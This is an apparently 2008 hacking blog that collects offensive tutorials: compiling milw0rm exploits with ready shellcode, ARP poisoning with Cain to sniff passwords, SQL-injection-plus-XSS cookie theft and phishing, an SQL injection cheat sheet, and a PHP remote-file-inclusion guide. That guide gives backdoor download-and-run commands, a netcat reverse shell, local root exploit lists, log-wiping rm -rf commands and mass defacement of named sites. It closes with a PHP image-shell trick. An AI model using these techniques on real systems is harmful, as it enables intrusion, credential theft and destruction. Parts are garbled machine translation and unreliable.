Wireless Security. Let's make security K.O.R.E.A

Using exploits. (Includes n00b protection)

r3dr0ot — Tue, 26 Feb 2008 06:02:20 GMT

###############
# Yes, Yes nooby, stfu if you think you are better than this level, everyone went thro this stage, and some had to learn this tha hard #way by getting flamed on forums. this should spare them that flame :)

I will discuss ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediatly know that it shouldnt be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options

in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32

press ok and compile again.
----

Using Shellcodes
you can generate shellcodes for metasploits projects with ease. here is one i made for this post




/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xdcxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x94x52x85x83xebxfcxe2xf4x10x7cx16x85xecx94xd9xc0"
"xd0x1fx2ex80x94x95xbdx0exa3x8cxd9xdaxccx95xb9xcc"
"x67xa0xd9x84x02xa5x92x1cx40x10x92xf1xebx55x98x88"
"xedx56xb9x71xd7xc0x76x81x99x71xd9xdaxc8x95xb9xe3"
"x67x98x19x0exb3x88x53x6ex67x88xd9x84x07x1dx0exa1"
"xe8x57x63x45x88x1fx12xb5x69x54x2ax89x67xd4x5ex0e"
"x9cx88xffx0ex84x9cxb9x8cx67x14xe2x85xecx94xd9xed"
"xd0xcbx63x73x8cxc2xdbx7dx6fx54x29xd5x84x64xd8x81"
"xb3xfcxcax7bx66x9ax05x7ax0bxe7x3axf0x98xf0x3dxf2"
"x82xb4x7fxe3xccxb9x21x85";

you can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.

then type the command you want it to execute, then press "generate payload"

PostPosted: Fri Dec 28, 2007 4:46 pm Reply with quoteBack to top
I will discuss ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediatly know that it shouldnt be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options

Image

in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32

Image

press ok and compile again.
----

Using Shellcodes
you can generate shellcodes for metasploits projects with ease. here is one i made for this post
Code:
/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xdcxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x94x52x85x83xebxfcxe2xf4x10x7cx16x85xecx94xd9xc0"
"xd0x1fx2ex80x94x95xbdx0exa3x8cxd9xdaxccx95xb9xcc"
"x67xa0xd9x84x02xa5x92x1cx40x10x92xf1xebx55x98x88"
"xedx56xb9x71xd7xc0x76x81x99x71xd9xdaxc8x95xb9xe3"
"x67x98x19x0exb3x88x53x6ex67x88xd9x84x07x1dx0exa1"
"xe8x57x63x45x88x1fx12xb5x69x54x2ax89x67xd4x5ex0e"
"x9cx88xffx0ex84x9cxb9x8cx67x14xe2x85xecx94xd9xed"
"xd0xcbx63x73x8cxc2xdbx7dx6fx54x29xd5x84x64xd8x81"
"xb3xfcxcax7bx66x9ax05x7ax0bxe7x3axf0x98xf0x3dxf2"
"x82xb4x7fxe3xccxb9x21x85";

you can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.

Image

then type the command you want it to execute, then press "generate payload"

Image

your shellcode should be printed out nicely for you.
- - -

Perl Exploits
If your using windows install this msi package. Lets use an example perl script from milw0rm. http://www.milw0rm.com/exploits/3661

save that exploit to your c: drive as a file called "3661.pl". This exploit justs generates an HTML file exploit, "exploit.html". Its that simple. But some exploits require you to have SSL installed. so you can grab that for windows at the top of this post with the other downloads. Some exploits may require you to pass "arguments" to the application, like this epxloit.

uh oh, noob protection?




syntax error at C:2552.pl line 47, near "print"
Execution of C:2552.pl aborted due to compilation errors.

well instantly i see the end of the line $vul=" is on has no ";" at the end of it. Put that in there so it looks like this




$host=$ARGV[0];
$path=$ARGV[1];
$vul="phpbb_security.php?phpbb_root_path=";

now save it and try again. YAY




C:>2552.pl

################################################## ########################
# #
# phpBB Security <= 1.0.1 Remote File Include Vulnerability #
# Bug found By : Ashiyane Corporation #
# Email: nima salehi nima[at]ashiyane.ir #
# Web Site : www.Ashiyane.ir #
# #
################################################## ########################

Usage: Ashiyane.pl [host] [path]

EX : Ashiyane.pl www.victim.com /path/

ARP Poisoning and Cain

r3dr0ot — Wed, 20 Feb 2008 09:00:19 GMT

Right then, it's time to get down to work! Today's post will focus on a useful little attack vector called ARP
Poisoning (Or ARP Cache Poisoning for the sticklers).

What is ARP?

The Address Resolution Protocol (ARP for short) is how network devices associate MAC addresses with I.P addresses so
that devices on the local network can find each other. ARP is basically a form of networking roll call.

ARP, a very simple protocol, consists of merely four basic message types:

1. An ARP Request. Computer A asks the network, "Who has this IP address?"
2. An ARP Reply. Computer B tells Computer A, "I have that IP. My MAC address is [whatever it is]."
3. A Reverse ARP Request (RARP). Same concept as ARP Request, but Computer A asks, "Who has this MAC
address?"
4. A RARP Reply. Computer B tells Computer A,"I have that MAC. My IP address is [whatever it is]"

All network devices have an ARP table, a short-term memory of all the IP addresses and MAC addresses the device has
already matched together. The ARP table ensures that the device doesn't have to repeat ARP Requests for devices it
has already communicated with.

Here's a basic example of a typical ARP process:

I want to print this article for a friend who's downstairs in the kitchen. In the kitchen there is a networked
printer with the i.p of 192.168.0.6. My computer has the i.p of 192.168.0.3.

So my computer broadcasts an ARP request to the entire network asking who has the i.p 192.168.0.6? All the computers
that don't have this i.p simply ignore this request but the printer who has the correct i.p wakes up and sends an
ARP reply saying "Hey! I'm 192.168.0.6 and my MAC address is FF:FF:FF:FF:FF:FF!".

Now my computer knows the printer's MAC address, it sends the file to be printed to the correct printer and
associates the printer's MAC address with the printer's i.p address in it's ARP table.

The one problem with ARP is that it's very trusting so it assumes that the computer who gives the i.p address and
the MAC address is the real computer. There's no verification. This was probably done to simplify networking at the
start but as you're about to see, it leave some very big security holes...

The Attack:

Since I'm using windows xp (windows haters don't kill me, I use linux on a regular basis), I'm going to
use a very clever program called Cain. You can download this program from www.oxid.it free of charge!

Some people use this tool and have no idea how it actually works and that's why I wrote this article, so you at
least know what it's doing!

So I'll fire up Cain:

(IMG:http://img155.imageshack.us/img155/3742/cainsd8.jpg)

(If this is too small then I've hosted it on imageshack at http://img155.imageshack.us/my.php?image=cainsd8.jpg)

Right so as you can (hopefully) see, I've fired up Cain, I've started up the sniffer (the little network card
icon at the top left) and I've started ARP (little radioactive symbol next to the sniffer).

Of course before you can do that, you need to scan your hosts, so click on the little hosts tab and you'll see
something like this:

(IMG:http://img138.imageshack.us/img138/8838/hostsfs1.jpg)

(If it's too small then go to imageshack at http://img138.imageshack.us/my.php?image=hostsfs1.jpg)

So, as you can see, the hosts list is empty! How to solve this? Right click and you'll see an option "Scan Mac
Addresses" . Select that and you'll see a form

(like http://img147.imageshack.us/my.php?image=scangn7.jpg).

Use the default of "Scan all hosts in my subnet" and you'll see a list of computer names, i.p addresses
and MAC addresses come up.

From there, go back into the ARP tab and at the top you should see a little plus sign click on it to get something like

(IMG:http://img218.imageshack.us/img218/9823/arpgt2.jpg)

I've taken my hack lab's router i.p and then on the right, all the i.p's that it associates!

Be careful with this as if you take the router, you must be able to forward ports otherwise the computers can't
communicated and then in a couple of clicks you've taken down their internet access and their network access.
It's pretty overt.

Anyway, back on topic.

Cain starts poisoning and you get something like: (http://img144.imageshack.us/my.php?image=poisonsm5.jpg) and yeah for
some reason it's overlapping. No big deal.

(IMG:http://img144.imageshack.us/img144/403/poisonsm5.jpg)

As you see it says that it's full routing. If you get half routing at first, that's normal.

Now, this is where it gets exciting!

Cain has yet another lovely feature, in which it picks up passwords from the traffic going through. So I'm going to
go to a email site and type in some made up credentials and we'll see what Cain picks up on.

So basically I created an account for this article and am going to log into that account on another computer.

(IMG:http://img72.imageshack.us/img72/2695/successpg8.jpg)

As you can see, there are two passwords that have come up! Of course the accounts aren't real but if they were I
would have full access.

This also works with FTP accounts, pop3 accounts, well just take a look in the options!

It shows how dangerous a simple attack can be. As it doesn't affect just the network, it can affect all of your
internet details too.

The Defense:
Scared? Good, Now Calm Down!

This is scary stuff. ARP Cache Poisoning is trivial to exploit yet it can result in very significant network compromise.
However, before you jump to Defcon-7, notice the major mitigating factor: only local attackers can exploit ARP's
insecurities. A hacker would need either physical access to your network, or control of a machine on your local network,
in order to deliver an ARP Cache Poisoning attack. ARP's insecurities can't be exploited remotely.

That said, hackers have been known to gain local access to networks. Good network administrators should be aware of ARP
Cache Poisoning techniques.

Since ARP Cache Poisoning results from a lack of security in a protocol that is required for TCP/IP networking to
function, you can't fix it. But you can help prevent ARP attacks using the following techniques.

For Small Networks

If you manage a small network, you might try using static IP addresses and static ARP tables. Using CLI commands, such
as "ipconfig /all" in Windows or "ifconfig" in 'NIX, you can learn the IP address and MAC
address of every device in your network. Then using the "arp -s" command, you can add static ARP entries for
all your known devices. "Static" means unchanging; this prevents hackers from adding spoofed ARP entries for
devices in your network. You can even create a login script that would add these static entries to your PCs as they
boot.

However, static ARP entries are hard to maintain; impossible in large networks. That's because every device you add
to your network has to be manually added to your ARP script or entered into each machine's ARP table. But if you
manage fewer than two dozen devices, this technique might work for you.

For Large Networks

If you manage a large network, research your network switch's "Port Security" features. One "Port
Security" feature lets you force your switch to allow only one MAC address for each physical port on the switch.
This feature prevents hackers from changing the MAC address of their machine or from trying to map more than one MAC
address to their machine. It can often help prevent ARP-based Man-in-the-Middle attacks.

For All Networks

Your best defense is understanding ARP Poisoning and monitoring for it. I'd highly recommend deploying an ARP
monitoring tool, such as ARPwatch, to alert you when unusual ARP communication occurs. This kind of vigilance is still
the greatest weapon against all kinds of attack -- for, as Robert Louis Stevenson wrote, "The cruelest lies are
often told in silence."

I'd like to thank http://www.watchguard.com/ for their defense section as I felt this was well written and it would
be redundant for me to write another section.

The introduction and the attack section was written by me.

- sas01

SiXSS attack tutorial

r3dr0ot — Mon, 18 Feb 2008 23:31:25 GMT

SiXSS attack tutorial

Author: HecTor

//Here can be some grammar mistakes, because English isnt my native language. Sorry, and tell me if you find a mistake
;)

[First]
This article tells about particularities of the use of such attacks as SQL Injection and XSS (Cross Site Scripting) in
one attack - SiXSS.
For who is written this article? The Article is for beginner in this area, but expects that there is some
knowledgeâ??s beside reader. That is to say, at least general notion about SQL-injection and XSS.
Well, do not forget about penal codes and criminal responsibility for your own actions. The author of the article has
not responsibility for possible caused damage.

[How to]
Adn what is a SiXSS? I already wrote above, this - joint use two types of the attacks. There can be a question: but why
this is necessary? There is SQL-inj, there is XSS, and there are dont need to be combinate!

But... Many people faced with such thing: fluent searching for of the criticality on web-put does not bring the success.
XSS is not seen, minimum of scriptsâ?¦ But! We have found the vulnerable request, removing inquired page
from database:

[vuln_url]
http://site.net/article.php?article=8
[/vuln_url]

Test on SQL injection vulnerability. We shall try so:

[vuln_url]
http://site.net/article.php?article=8+AND+1=2/*
[/vuln_url]

There is nothing.

[vuln_url]
http://site.net/article.php?article=8+AND+1=1/*
[/vuln_url]

Itâ??s executed. Its mean â?? this is SQL-injection. Next, hacker tries to pull out necessary given from
database. However, what we shall do if no concrete information comparatively database, or database forbids the access to
files? Time goes...
Right here, comes SiXSS.

[SQL and XSS]
The SQL language, have a UNION operator, which can combinate two requests. I'll try to explain:

[vuln_url]
http://site.net/news.php?id=1+union+select+1,DATABASE(),3/*
[/vuln_url]

The request select the news with identifier 1, and in this request to select information about this database.
However, UNION SELECT enables to show in browser window arbitrarily text. Due to this, just, we and can successfully use
SiXSS. In the beginning, certainly, it is necessary to pick up quantity water, since the quantity of fields taken from a
database, should be equal to quantity of taken fields after UNION.

[vuln_url]
http://site.net/article.php?article=8+union+select+1,2,3/*
[/vuln_url]

This can be us to help if UNION is not filtered. We shall introduce javascript through SQL inj. After all, he is
displayed in browser, due to particularities UNION SELECT.

[vuln_url]
http://site.net/article.php?article=8+union+select+/*
[/vuln_url]

Here is and alert-window with message â??Vulnerabilityâ??. If we will work with this script, we will get
passive XSS criticality - dispatch cookies passed on such reference of the person to us, on sniffer. This was to be
proved - now we can work with this vulnerability, like as with a usual XSS.

[Troubles]
Though, all not so simply, this is â??the ideal variantâ?? of â??ideal vulnerabilityâ??. To
example, what we going to do, if server have a directive "magic_quotes_ gpc", which filters the quotation
marks? This is not a trouble. To avoid this filtering, possible to use coding in HEX, with accompaniment 0x, or ASCII
encoding. You can use the some programs, or special script, or facility same MySQL Database or other (the function
char() and hex()).

So, we shall consider that we coded in HEX expression Â«Â». Let's try to substitute this value in vulnerable inquiry:

[vuln_url]
http://site.net/article.php?article=8+union+select+0x3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E
[/vuln_url]

So, we are bypassing the magic_quotes. Now we shall speak â??bad look of URLâ??. They same, as well as at
usual passive XSS: the person can not pass to the link (long and not clear URL), or at the person performance javascript
is switched-off. We shall begin.

There is a set of different ways to force a victim to pass under the "poisonous" link without suspicion. I
shall tell about one of such ways.

If you have read some articles about XSS, and use this vulnerability in practice, you must have a notion about that: how
to use passive XSS in POST-request. I try to explain. To example, given are sent vulnerable reqest by POST-method.
Example: HTML-form:

[html code]

[/html code]

And here is script, with name xss.php:

[php code]
echo $_POST['alert']
?>
[/php code]

So, if we shall transmit already known javascript - alert will appear, but in an address line the URL of a vulnerable
script donâ??t have any GET parameters. That is, a little suspicious.

The poisonous link palm off so: write a script which sends reqest to a vulnerable script, and fill it on any host. Then,
give the link on such script to victim. And victim, nothing not suspecting, passes on the link. Data, POST are sent
inquiry to a vulnerable script. Result - XSS has gone right!

Thus, it is possible a foreign script and to redirect a victim on the poisonous reference(link) with ours SiXSS.
Example: such script on PHP, will be redirect browser to the other page:

[php code]
header("Location: link")
?>
[/php code]

Its fine, one more problem behind. But we will return to the JS switch off.

I have read about one interesting method. Using UNION SELECT, we can bring on page not only javascript, but also - HTML.
So, it is possible to fake the page with input of login and password with sending to our script, which will write all
data to a file. It is simple fishing. Sounds good, yes?

[Hacked, yeah =)]
Anything "supernew" in article is not present, all the same SQL-inj and XSS. I hope, you have gathered
something for yourself from it. If you find any thematic mistakes â?? tell me about this.

Und3r h4ckin9 F0rum lol

r3dr0ot — Mon, 18 Feb 2008 14:34:30 GMT

http://72.20.10.53/affiliates.dmz

SQL Quick Reference Revised

r3dr0ot — Mon, 18 Feb 2008 11:17:38 GMT

SQL Quick Reference.

Symbols and Words:
' starts new query

OR: tells it to do what the query is suppose to do OR what you tell it.

AND: Will only execute if both conditions are true. Might wonder why you would
actually want there end to have to evaluate to being true as well. But there is a reason.
Which will be in next article.

backslash' :need it to break up quotes when the admin has programed in double quotes

/* :comment out rest of query a lot like --. I find it works in combination with
the backslash'

; :end query

' having 1=1-- : If your lucky it will give you an error containing a column name.

It should be the first it comes across. You get the error because the statement

should be group by a column HAVING something, that something being a value of some sort letter number whatever. Seeing
as

your missing the group by it will give you an error. If you get a column name next you would want ' group by
ColumYouGot

having 1=1--. That should give you the next column. Next statement would be ' group by colum1,colum2 having 1=1--.

You can just keep using that syntax until you dont get an error, that would mean you have all the columns.

What can you do with all that crap? You would insert it into the table useing

' insert into tablename values(blah,blah,blah,blah); Your going to need the right

type of data for each of those columns most of which you can tell by the name of it.

But most of the time there will be at least one you need to check. To do this you

would do ' union select sum(column) from table name--. This will give you an error in

converting the value of that column type into an integer. So once ya have all that

insert the values you want yay.
----------------------------------------------------------------------------------------------------

' or 1=1: most basic injection. Will work maybe 1 in hundred times. It will search for

the first value that equates to true. In other words the first value that exist.
----------------------------------------------------------------------------------------------------

backslash' or 1=1/* does the same thing but is used when there doubleing up quotes. This

escapes you from the quotes the /* comments out the rest of the query.
----------------------------------------------------------------------------------------------------

' ORDER BY 1--: Used to see how many columns are in a givin table. If you dont get

an error returned then keep increasing the number by one until you do get an

error. The number you used right b4 the one you got an error is the number of columns.

EX: order by 9 gives no error. You then try order by 10 which gives you an error.

the number of of columns is 9. Also use common sense. If you think its a huge database

dont start at 1 and increase by one.
-----------------------------------------------------------------------------------------------------

' drop tablename-- This is used to delete and entire table. Never used it. Dont

be a dick.
-----------------------------------------------------------------------------------------------------
'union select 1,2,3 from tablename--: with any luck will give you the value of one or more of

the columns within the table. Has worked a few times.
-------------------------------------------------------------------------------------------------------

' union select min(column) from tablename WHERE value > letter:

example: union select min(passwd) FROM Passwords WHERE value > a

What it tries to do is select passwd where the minimum value is greater than

A and convert it to an integer. The error would produce something like: error

converting varchar value ants into column type integer. Have had this work once

but thats about it. Rest of the time it just returned error with just that single

letter.
---------------------------------------------------------------------------------------------------------
Well thats it for this one was supposed to be a quick reference. Will get more into
it into these commands and what you can do with them in next article along with
more advanced commands. Understand that these are in a forms based format.

PHP injection - Access Server

r3dr0ot — Mon, 18 Feb 2008 11:16:58 GMT

#################
# Not written by me, but by phAnt0mh4ck3r of h4cky0u, Its not that well written, but sure covers stuff thats need to
know.
#

1. What it is?
2. As to explore
3. Aid of google
4. Exploits local
5. Erasing Logs
6. As to arrange the vulnerability
7. Tools
8. Commands

-----------------------------------------------------------------------

1. What it is?

The known vulnerability more as: Remote File Inclusion, or remote Inclusao of archives, bug discovered between 2002 and
2003, to put still today many are unaware of it.

Bugs found sao in its majority, in scripts of php, exists disponiveis thousands for the Internet, every day new bugs of
strings sao found and displayed in sites of security, and consecultivamente nao delay very to appear modified thousands
of sites, and for coencidencia, 99% of these used scripts php bugados.

But where this espeficicamente bug, it eh found in funcoes of php, that joined with one script badly written, makes
possible inclusao remote of archives, most used sao:

Main (, Include (, Include_Once (, and others, and generally funcao that it has bug is almost thus:

main (to $dir. ?file?)

We go to say that the arkivo that has this funcao if calls index.php, is enough the usuario now
in its navigator to type: index.php? dir=cmd < - q sera explained the front more.

Eh a simple error, but that it has caused great prejudices for the world.

-----------------------------------------------------------------------

2. As to explore

Vitima: Site that you will go to explore the imperfection of php.
String: Archives in the site suceptiveis to the attack.
Cmd: Script in PHP that in makes possible them to type
commands to be incluidos in php.
Backdoor: It opens doors in the system for remote connection 'without
autentica??o'.
Connect Back: It opens a door specifies for conexao between its
PC and vitima.
Exploit: Program that explores certain imperfection in a system.
It has some types of Exploits. Here, we will go
to deal only with Place Root Exploits. (they explore
imperfections local that they take common users
access root - super-user -)
Shell: It is an interpretative program of commands that
it allows the user to iteragir with the system
operational through typed commands.
Telnet: We will use for remote connections.
Firewall: It is an intelligent barrier between a local net
e the Internet, through which it only passes traffic
authorized. This traffic is examined by
firewall in real time and the election is made of
agreement with the rule. ?what it was not express
allowed, it is forbidden "
root: Super-user. He is admin? has total access to
system.

* Strings

Strings has several available. In this tutorial one, I will go to use stops
examples well simple one that is ?index.php? page=?. In annex, the end,
several others: P

* Syntax

Former:
www.site.com /arquivo.php? data= http://CMD/cmd.gif?&cmd= ls

^ ^ ^ ^
Vitima String CmD command unix

(P.S.: Without the spaces)

* Using the CmD

Cmd = http://www.site.com/cmd.gif?&cmd=

In the result, it inserts cmd in string.
Former: www.site.com/index.php?page=http://www.site.com/cmd.gif?&cmd=

In the CMD:

sysname: --> Operational system twirling.
nodename: --> local Name.
release: --> Version of kernel.
Script Current User: --> Using for which script is being executed.
PHP Version: --> Version of php of the machine
User Info: --> Information of user (uid, euid, gid).
Current Path: --> current Folder that you are in the server.
Server IP: --> IP of the server.
Web server: --> Information on the server.

* Gaining access to shell

He is the interpreter of commands of the machine. For this, she is necessary of: Backdoor and Connect Back.

* Twirling backdoor in the server for remote connection

To twirl a backdoor, it is enough to make one upload, to choose permissions, and to execute it.

Command: compact disc /var/tmp; wget www.site.onde.es t? .o.backdoor.com/backdoor;chmod 777 backdoor;. /backdoor

compact disc /var/tmp - > Faz the operation in this folder, for being common
all the users and had to its permissions.
/tmp tb serves:)

wget www. (...) /backdoor - > Copia the backdoor from a URL for
site. When wget not to function, tries others
commands. Syntaxes:

- Possiveis programs to make download of the archives

wget www.site.com/arquivo
lynx - source www.site.com/arquivo > archive
curl - the www.site.com/arquivo archive
GET www.site.com/arquivo > archive
(...)

Now, it is enough to connect itself shell. How?

In the Win: To initiate - > Executar - > telnet www.site.com carries

Where www.site.com receives name or IP from the site that you twirled the backdoor and carries is the door that the
backdoor is working.

If to appear in the telnet bash-2.05b$ or something seemed, is because it functioned! E you have access to shell in the
machine. If to delay a time and not to fall in shell, confer nome/ip of the server.
If he will be correct, it is twirling Firewall. E now? simple, Connect Back.

* Connect Back

Very efficient method to gain shell in a machine. It gains shell reversamente.
Windows: It lowers netcat for windows and in Prompt of MSDOS (in the folder that nc if finds), it types: nc - vv - l - p
15, where 15 can in accordance with be chosen its preference. This door will be the one that will carry through the
connection.

Now, coming back to browser it, in cmd it types the following command:
compact disc /var/tmp; wget www.site.do.dc.com/dc;chmod 777 dc;. /dc IP carries

compact disc /var/tmp - > Exactly that for backdoor.
wget www.site.do.dc.com/dc - > | | | |, but is logico, with
address of dc.
./dc IP carries - > where IP is ITS IP and carries is the door
that you it chose in netcat.

Made this, if to occur all certainty, it will appear as resulted:

Connect Back Backdoor

* Dumping Arguments
* Resolving Host Name
* Connecting?
* Spawning Shell
* Detached

This means that you if it connected in shell!

If to appear

Connect Back Backdoor

* Dumping Arguments
* Resolving Host Name
* Connecting?
[-] Unable you the Connect

it confers the data (its IP, carries, netcat, etc). If to insist, its
not accepted net this type of connection. It tries other doors (as 80, 22,
15, etc).

-----------------------------------------------------------------------

4. Exploits local

2.4.17
newlocal
kmod

2.4.18
brk
newlocal
kmod
km.2

2.4.19
brk
newlocal
kmod
km.2

2.4.20
ptrace
kmod
km.2
brk

2.4.21
km.2
brk
ptrace

2.4.22
km.2
brk
ptrace

2.4.23
mremap_pte

2.4.24
mremap_pte
Uselib24

2.4.27
Uselib24

2.6.2
mremap_pte
krad

2.6.5 you the 2.6.10
krad krad2

-----------------------------------------------------------------------

5. Erasing Logs

rm - rf /var/log
rm - rf /var/adm
rm - rf /var/apache/log
rm - rf $HISTFILE
find/- name .bash_history - exec rm - rf {} ;
find/- name .bash_logout - exec rm - rf {} ;
find/- name log* - exec rm - rf {} ;
find/- name *.log - exec rm - rf {} ;

-----------------------------------------------------------------------

6. As to arrange the vulnerability

To edit the archive php.ini in the folder of configuration of its apache and incapacitating the functions:
they system, exec, passthru, shell_exec

-----------------------------------------------------------------------

7. Tools

Voce can find some tools in the sites:

-

http://mescalin.100free.com
- http://www.packetstormsecurity.org
- http://www.milw0rm.com
- http://www.securiteam.com

-----------------------------------------------------------------------

8. Commands

ls - > List archives. It can be combined with - (shows occult) and - l (it shows at great length). Former: ls - la
(it shows the archives, also occult at great length).
uname - - > Mostra information of the system, as version of kernel,
uteis name, and other things.
id - > Mostra its id.
w - > List the users logados at the moment.
cp - > Copia archives. Syntax: cp /destino/ archive
mv - > Move archives. Sintexe: mv /destino/ archive
rm - > Remove archives. If combined with - rf, removes all
the setados archives, also folders
to mkdir - > diretorio Cria
to rmdir - > diretorio Exclui
find - > Procura for archives/folders. Former: ?find /etc - name
httpd.conf ?looks for for httpd.conf in the /etc folder
pwd - > Mostra where folder you are located
cat - > Exibe the content of an archive in the screen

head - > Exibe lines of the beginning of the archive
tail - > || || || final of the archive
ctrl+c - > Sai/killa one programs
ctrl+r - > Busca command typed in history of bash
ps - auxw - > List all the processes of the system
netstat - in - > Status of the connection
kill -9 - > Mata process. Syntax: kill -9 PID OF the PROCESS
kill - HUP - > Reinicia process. Syntax: kill - HUP ID OF the PROCESS
peak - > Publisher of text. Syntax: peak archive
vi - > | | vi archive

Saving resulted in archives
?/armazenado command > /arquivo/onde/ser
Former: ls /etc > /tmp/s.txt safe all the result of the listing of
/etc in the /tmp/s.txt archive

Adding lines in archives
echo ?line? >> /arquivo/onde/ser ?/incluido

Unpacking archives (most common)
.tar - > to tar xvf arquivo.tar
.tar.gz - > to tar zxvf arquivo.tar.gz
.tar .bz2 - > to tar jxvf arquivo.tar .bz2
.zip - > unzip arquivo.zip

Compactando archives (most common)
.tar - > to tar cvf destino.tar ARCHIVE
.tar.gz - > to tar cvf destino.tar ARCHIVE | gzip destino.tar
.tar .bz2 - > to tar cvf destino.tar ARCHIVE | bzip2 destino.tar
.zip - > zip DES tino.zip ARQUIVO

* List of sites running on server

* Using httpd.conf file

Generally the data of the housed sites are in this archive. To make a listing of the sites, it is enough to type a
command that will go to read the archive httpd.conf and to print the lines that contain ServerName
(name of the sites). (in the folder where httpd.conf if finds)

cat httpd.conf | grep ServerName

(they will be in this archive same, you result can to save in archive - preferential in the folder of the site that you
left - and to make download)

---->
How? Good, in the CMD, it types pwd. You it will see the place where you
if it finds in the server. Former: /home/httpd/vhosts/nasa.gov/web/
Let us say that the URL is this: http://nasa.gov/index.php?page=CMD
Then, if you to play the result for /home/httpd/vhosts/nasa.gov/web
This archive will be in the root of the site. To only type this command:

cat httpd.conf | grep ServerName > /home/httpd/vhosts/nasa.gov/web/RESULTADO.txt
(only one example)
Made this, http://nasa.gov/RESULTADO.txt and to lower the list: P

<----

Now, where it is this? GENERALLY in the folders /etc/httpd/conf or /etc/apache/conf but it varies very and it can be
found in other places. An efficient way, to put delayed, to find is making a complete search for sitema. Command:

find/- name httpd.conf

This prints where he is httpd.conf in the server. It can appear more than a result.

* Other ways?

If exactly thus, not to obtain to find which sites has there, looks alternative forms. Unhappyly it does not have as to
explain therefore in each server it has a way.

Example:

If in the folder where the sites are located, you to list them and the result ja will have the name and domain of them:
former: ls /home/httpd/vhosts
site.com
mtv.com .br
nasa.gov
whitehouse.gov
etc

* Making Mass Defacement

Good, first, it creates one index that you it wants that is in the place of the others. Made it, plays for some place
that you can make upload pro server.

Now, the end: to change to all the others for its. Simple, a command for this is enough:

find /pasta/onde/est ?o/os/sites - name ?index.*? - exec cp /onde/est ?/sua/index.html {} ;

To know where they are the sites, only pwd in cmd. Former: /home/httpd/vhosts/nasa.gov/web

One notices that all the others are in /home/httpd/vhosts.

Equal backdoor makes upload. wget http://suaindex.com/sua.index

Let us say that you it made for the /tmp folder, then, the command would be thus:

find /home/httpd/vhosts - name ?index.*? - exec cp /tmp/index.html {} ;

SQL injection in URL

r3dr0ot — Mon, 18 Feb 2008 11:15:23 GMT

Some differences.

1.When doing a url based attack to not alter the querty causing it to change before it has run its normal course.

Described in better detail.

Ex: id=15, dont go deleteing the 15 and throwing in a single quote it can cause issues. When i write the article ill
explain how and why. Anyways you would want to plug it in as id=15'

2.Obvious injection points to look for is most places with an equal sign.

3.Unlike a forms based injection where you keep the ' for your injections you wont be doing that for the url
based.

Yes for the intail testing you want to plug it in but for a valid query you want to keep the process flowing so

when you do your injection it would be id=15 union blah blah blah.

4.Common mistake of not url encoding charactors. Granted is varies upon what server is running back end. Your going to

want to url endcode.

ex: blind injection test id=15plussign1 to see if you get the id page of 16. You want 15 percentsign2b which is the plus
sign

url encoded. Do the same of other special chars if you want them to be read in correctly.

Another injection worth mentioning that i left out of the last article is; Union all select table_name from
information_schema.tables--

Information_schema is a list of all tables within a a database it is found in some but not all sql servers. MS sql and
mysql

being two of them. Now this wont always for as sometimes you as a user need certain privledges to access these tables.
You can

do the same to get all the column names by do the same injection only doing so with union all select column_name from

information_schema.columns. Now this sort of thing is not limit to just information_schema. Below are listed some tables
and

other things with which you can gather the same information but diffrent SQL versions. Im not going to list each command
to

get these contents due to the fact im hoping you actully know some SQL and arnt just reading these and going of skid.

One thing you just understand is that even on the same server your syntax for getting these things to work can be
diffrent.

For instance i have found that the syntax for one particular url based injection was id='10 and so on. This was a
bit diffrent

due to the fact it goes against the general rule not to interupt the natural flow by placing the ' before the valid
value.

Generally this isnt how it goes but you never know. There always a bit of testing involved by with some effort,logic and

knowlege of how sites are programmed in general you will get it right.

MS SQL SEVER:
Sysobjects
Syscolumns

some useful variables to gather info use them with the select commmand

@@language
@@microsoftversion
@@servername
@@servicename
@@version

MS ACCESS:
Msysobjects
MsysQueries
MsysRelationship
MsysACEs

Oracle:
SYS.USER_OBJECTS
SYS.TAB
SYS.USER_TABLES
SYS.USER_VIEWS
SYS.ALL_TABLES
SYS.USER_TAB_COLUMNS
SYS.USER_CONSTRAINTS
SYS.USER_TRIGGERS SYS.USER_CATALOG

Image Shells | Use and Create Them

r3dr0ot — Mon, 18 Feb 2008 11:14:17 GMT

welcome to the tutorial!

today we will create a working image shell that does not break the image and make it invalid. This image shell can be
useful when finfing lfi and its use will be explained, its actually pretty simple.

First open up photoshop and use the following settings for our example:

http://www.psp-gamerz.com/1.jpg

then add an avatar or image and some text if you like:

http://www.psp-gamerz.com/3.jpg

now to insert working php code do file >> file info

http://www.psp-gamerz.com/4.jpg

on the copyright url line insert your php code

http://www.psp-gamerz.com/5.jpg

Now when you have lfi you can view local files and include them.

So we find an lfi vulnerable site with a forum or some type of image uploading. Now find out the location of our
image-shell and include it in our query. for example:

i have found :

index.php?page=home.htm

you do :

index.php?page=images/uploads/image.jpg

It will successfully run the php code and include a shell or do whatever you want.

Hope you enjoyed this tutorial good luck on your next hack

SQL Injection Attacks

